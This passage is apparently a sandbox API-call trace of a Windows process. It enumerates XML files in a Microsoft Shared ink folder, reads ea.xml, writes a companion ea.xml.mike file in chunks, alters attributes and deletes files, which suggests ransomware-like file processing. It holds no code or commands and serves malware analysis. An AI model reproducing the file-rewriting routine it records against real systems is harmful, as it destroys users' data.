nFileSizeLow=0x188, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor-kor.xml", cAlternateFileName="")) returned 1 [0045.622] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0045.622] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0045.622] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.622] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.622] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.624] GetFileType (hFile=0x264) returned 0x1 [0045.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.624] GetFileType (hFile=0x264) returned 0x1 [0045.624] CloseHandle (hObject=0x264) returned 1 [0045.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.624] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.624] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.624] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), fInfoLevelId=0x0, lpFileInformation=0x214ba64 | out: lpFileInformation=0x214ba64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180)) returned 1 [0045.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.625] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), fInfoLevelId=0x0, lpFileInformation=0x214bd94 | out: lpFileInformation=0x214bd94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180)) returned 1 [0045.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.625] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.625] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.626] GetFileType (hFile=0x264) returned 0x1 [0045.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.626] GetFileType (hFile=0x264) returned 0x1 [0045.626] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.626] WriteFile (in: hFile=0x264, lpBuffer=0x214cc9c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x214cc9c*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.627] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), fInfoLevelId=0x0, lpFileInformation=0x214c78c | out: lpFileInformation=0x214c78c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180)) returned 1 [0045.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.627] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.627] GetFileType (hFile=0x264) returned 0x1 [0045.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.627] GetFileType (hFile=0x264) returned 0x1 [0045.628] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.628] ReadFile (in: hFile=0x264, lpBuffer=0x214ddcc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x214ddcc*, lpNumberOfBytesRead=0x2af038*=0x180, lpOverlapped=0x0) returned 1 [0045.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.629] GetFileType (hFile=0x264) returned 0x1 [0045.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.629] GetFileType (hFile=0x264) returned 0x1 [0045.629] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.629] WriteFile (in: hFile=0x264, lpBuffer=0x2151274*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x2151274*, lpNumberOfBytesWritten=0x2af02c*=0x180, lpOverlapped=0x0) returned 1 [0045.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.630] GetFileType (hFile=0x264) returned 0x1 [0045.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.630] GetFileType (hFile=0x264) returned 0x1 [0045.631] WriteFile (in: hFile=0x264, lpBuffer=0x21544a0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21544a0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.631] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe565d480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe565d480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe565d480, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3a0)) returned 1 [0045.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.631] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2155c90 | out: lpFileInformation=0x2155c90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe565d480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe565d480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe565d480, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3a0)) returned 1 [0045.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", dwFileAttributes=0x80) returned 0 [0045.633] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.633] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.633] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe565d480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe565d480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe565d480, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3a0)) returned 1 [0045.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.633] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpFilePart=0x0) returned 0x4e [0045.633] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike", lpFilePart=0x0) returned 0x53 [0045.633] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.mike")) returned 1 [0045.635] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.635] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.635] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.637] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.637] GetFileType (hFile=0x264) returned 0x1 [0045.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.637] GetFileType (hFile=0x264) returned 0x1 [0045.637] CloseHandle (hObject=0x264) returned 1 [0045.637] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.637] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.637] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.637] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 